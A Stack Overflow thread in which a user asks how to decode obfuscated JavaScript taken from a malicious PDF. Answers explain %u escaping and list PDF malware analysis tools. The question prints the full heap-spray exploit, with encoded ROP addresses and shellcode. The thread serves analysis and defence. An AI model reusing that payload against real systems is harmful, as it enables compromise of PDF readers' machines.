Extract JavaScript from malicious PDF

I have a PDF file that I know for a fact contains JavaScript that does something malicious, though I'm not sure exactly what at this point.

I have successfully uncompressed the PDF file and extracted the plaintext JavaScript source code, but the code itself is kind of hidden in a syntax I haven't seen before.

Code example: This is what the majority of the code looks like

var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')

I imagine that this notation, with its long variable/function names and hidden text characters, is meant to confuse scanners that look for this type of thing.

Two questions:

Question 1

Can someone tell me what this %u4141 notation is called?

Question 2

Is there some tool that will translate that notation into plaintext so I can see what it is doing?

Full JS code:

var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');

var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");

while (C.length + 20 + 8 < 65536) C+=C;

D = C.substring(0, (0x0c0c-0x24)/2);

D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";
Fulgurous answered 19/4, 2012 at 1:37 Comment(7)
Is there more js code, except these two var ... lines? - Elvyn
Yeah there is more, but I didn't want to crowd the post, I will post it now. After examining it I don't really see anything that is malicious. It must have just set AVAST off when it started executing from inside of the PDF. I also renamed all of the variables so that they don't hurt your brain to look at. - Fulgurous
It looks like you have already extracted the JavaScript from the PDF. Your problem seems to be with analyzing this JavaScript, or? - Ailssa
@pipitas Correct, I significantly cleaned up the code before posting it here. Every single variable above was at least 32 characters long, and also the unescape function was aliased in another variable. I can't really tell what this is doing, but it doesn't appear malicious to me. - Fulgurous
Is this the complete Javascript code?!? Very often, more parts of Javascript are hidden inside the PDF at different places... Does the container-PDF make use of object streams (/ObjStm)? - Ailssa
@pipitas this is the only block that contains any Javascript in the whole file. - Fulgurous
@HunterMcMillen: You should use qpdf to uncompress all compressed streams and also disable object streams using this command: qpdf --qdf --object-streams=disable malicious.pdf malicious-uncompressed.pdf. -- Then you can be (more) sure you'll discover all instances of JavaScript (unless a bug in QPDF makes it fail to generate a high-fidelity clone of the original PDF). - Ailssa

Those could be memory addresses, OS calls, heap spraying, anything.

The clue is that the function that is called is unescape. To get the actual values you want to unescape that text. There are online tools for unescaping text, such as http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html.

The result will likely be garbage in ASCII, but you can try plugging it into a hex editor to see if you can make any more sense out of it. If a virus scanner can identify the infection source of that file, maybe you can do more research on that particular malware and figure out what that code is doing.
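If you would rather not paste malware into an online converter, the decoding step is easy to do offline. Below is a minimal sketch (the function names percentUToBytes, toHex and toDwords are made up for this example) that turns %uXXXX escapes into raw bytes without calling unescape. It assumes each %uXXXX is one 16-bit value stored low byte first, which is how such strings usually end up in memory on x86, and it also prints the bytes grouped as 32-bit values, since those are easier to compare against addresses.

```javascript
// Decode a %uXXXX-escaped string into raw bytes without calling unescape().
// Assumption: each %uXXXX is one 16-bit unit laid out little-endian,
// so %u63a5 becomes the bytes a5 63.
function percentUToBytes(escaped) {
  const bytes = [];
  const pattern = /%u([0-9a-fA-F]{4})/g;
  let match;
  while ((match = pattern.exec(escaped)) !== null) {
    const unit = parseInt(match[1], 16);
    bytes.push(unit & 0xff);        // low byte first
    bytes.push((unit >> 8) & 0xff); // then high byte
  }
  return bytes;
}

// Format bytes as a space-separated hex string.
function toHex(bytes) {
  return bytes.map((b) => b.toString(16).padStart(2, "0")).join(" ");
}

// View consecutive 4-byte groups as little-endian 32-bit values.
function toDwords(bytes) {
  const dwords = [];
  for (let i = 0; i + 3 < bytes.length; i += 4) {
    const value =
      (bytes[i] | (bytes[i + 1] << 8) | (bytes[i + 2] << 16) | (bytes[i + 3] << 24)) >>> 0;
    dwords.push("0x" + value.toString(16).padStart(8, "0"));
  }
  return dwords;
}

// First few escapes from the question's string.
const escapedSample = "%u4141%u4141%u63a5%u4a80%u0000%u4a8a";
const decodedBytes = percentUToBytes(escapedSample);
console.log(toHex(decodedBytes));
// 41 41 41 41 a5 63 80 4a 00 00 8a 4a
console.log(toDwords(decodedBytes).join(" "));
// 0x41414141 0x4a8063a5 0x4a8a0000
```

The byte array can be written to a file with Node's fs.writeFileSync(path, Buffer.from(decodedBytes)) and opened in a hex editor or disassembler.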

In the interest of science, fire up a Windows VM, run it, and see what it does :)

Puiia answered 19/4, 2012 at 1:43 Comment(2)
Thank you for the link. As @steveax says the document is made up entirely of those characters. Thank you. - Fulgurous
@steveax Ha, yea I bet 80% of those characters are going to look like that. Which is why the data needs to be inspected in a hex editor. - Puiia

It looks like you have already extracted the JavaScript from the PDF. Your problem seems to be with analyzing this JavaScript.

Since this topic (obfuscating and hiding malicious JavaScript code in harmless-looking PDF files) seems to be becoming more and more popular with malware authors, let me list some tools and websites which have proved helpful to anyone who's a beginner in dissecting this type of threat:

  1. Didier Stevens' PDF-Tools
  2. Part 1 (of many) of Didier Stevens' PDF Malware Screencasts (on YouTube)
  3. Jay Berkenbilt's QPDF: utility for content-preserving PDF transformations (useful command to unpack all/most compressed objects inside a PDF:
    qpdf --qdf original.pdf unpacked.pdf
    then open unpacked.pdf in text editor)
  4. Julia Wolf's presentation about PDF malware obfuscation
  5. peepdf: A Python tool to explore PDFs (find out if they are malicious)
  6. PDFTricks: a (non-exhaustive) list of PDF source code obfuscation methods
  7. Wepawet: online resource to analyse PDF/JavaScript/Flash files (generates a report)
  8. Origami-PDF: Ruby tool to analyze and generate malicious PDFs
  9. (... many more resources not listed here...)

I don't know exactly how you extracted the JavaScript snippet you provided in your question. But, by all means, don't rely on having found all of the JS code inside the PDF -- unless you are a PDF expert who knows where to look and how to uncover all possible obfuscations. (I recommend you apply tool No. 3 to your source PDF and look at the resulting PDF in the light of the tips in No. 6... The other tools may need some more studying of PDF syntax before you can really make them useful to you.)
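As a rough first pass over the unpacked file from tool No. 3, you can grep for the keys that usually introduce or trigger scripts. Here is a minimal sketch of that idea; the function name findScriptMarkers and the choice of keys (/JavaScript, /JS, /OpenAction, /AA) are my own picks for illustration, not a complete list. It only sees plain, unobfuscated names, so an empty result proves nothing.

```javascript
// Scan the text of an already-uncompressed PDF for keys that commonly
// introduce or trigger JavaScript. Reports the first such key on each line.
// Assumption: names are written literally (no #xx hex escapes).
function findScriptMarkers(pdfText) {
  const markers = /\/(JavaScript|JS|OpenAction|AA)(?![A-Za-z0-9])/;
  const found = [];
  pdfText.split(/\r?\n/).forEach((line, index) => {
    const match = markers.exec(line);
    if (match) {
      found.push({ line: index + 1, key: match[1], text: line.trim() });
    }
  });
  return found;
}

// Tiny hand-written stand-in for an unpacked PDF.
const unpackedSample = [
  "1 0 obj",
  "<< /Type /Catalog /OpenAction 5 0 R >>",
  "endobj",
  "5 0 obj",
  "<< /S /JavaScript /JS 6 0 R >>",
  "endobj",
].join("\n");

console.log(findScriptMarkers(unpackedSample));
```

For a real file, read it first with something like require("fs").readFileSync("unpacked.pdf", "latin1") and pass the resulting string in.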


Update

Here is an update to my (almost 3-year-old) answer. It's worthwhile to add:

  1. pdfinfo -js: the most recent (Poppler-based!, not XPDF-based) versions of pdfinfo (starting with v0.25.0, released Dec 11, 2013) now support the -js command line parameter, which prints out the JavaScript code embedded in a PDF file.

    This works even in many cases where the /JavaScript name within the PDF source code is obfuscated by using (formally legal) PDF name constructs such as /#4AavaScript or /J#61v#61Script or similar.

    Unfortunately, this marvelous addition to pdfinfo is still far too little known. Please share!
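To see why such obfuscated names are still the same name: in PDF syntax, # followed by two hex digits inside a name stands for the character with that code. A minimal sketch of undoing that by hand (decodePdfName and isScriptName are names invented for this example, not part of any tool):

```javascript
// Decode #xx hex escapes in a PDF name token, e.g. "/J#61v#61Script".
function decodePdfName(name) {
  return name.replace(/#([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// True if the token is /JavaScript or /JS once escapes are decoded.
function isScriptName(name) {
  const decoded = decodePdfName(name);
  return decoded === "/JavaScript" || decoded === "/JS";
}

for (const token of ["/JavaScript", "/J#61v#61Script", "/#4AavaScript", "/#4a#53", "/Java"]) {
  console.log(token, "->", decodePdfName(token), isScriptName(token));
}
```

Running every name token through a decoder like this before searching is one way to make a plain text search catch the obfuscated spellings too.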

Update 2

Another update, because the above-mentioned peepdf tool recently got the extract sub-command added:

  1. peepdf.py: This is a Python-based command line tool which can analyse PDF files. It was developed by Jose Miguel Esparza mainly in order to "find out if the file can be harmful or not", but it is also very good for general exploration of PDF file structures.

    Installation and usage:

    1. Clone the GitHub repository:
      git clone https://github.com/jesparza/peepdf git.peepdf
    2. Create a symlink to the peepdf.py script and put it somewhere into your $PATH:
      cd git.peepdf ;
      ln -s $(pwd)/peepdf.py ${HOME}/bin/peepdf.py
    3. Run it in interactive mode, opening a PDF file:
      peepdf.py -fil my.pdf
    4. Use the extract js > all-js-in-my.pdf command to extract and redirect all JavaScript contained in my.pdf into a file.

Ailssa answered 19/4, 2012 at 16:8 Comment(1)
@Kurt Pfeifle Thank you for this list. Do you have any suggestions around disarming PDFs? I know PDFiD has an option. Does flattening a PDF have the same effect for disarming? - Corbel

The following gem helps determine whether a PDF file contains malicious code. It returns an error message that names the policy the file failed.

Ex: If JavaScript is written into the file, it returns an error message with the failed policy allowJSAtOpening.

https://rubygems.org/gems/pdf_scanner

Wingback answered 23/2, 2023 at 4:47 Comment(0)
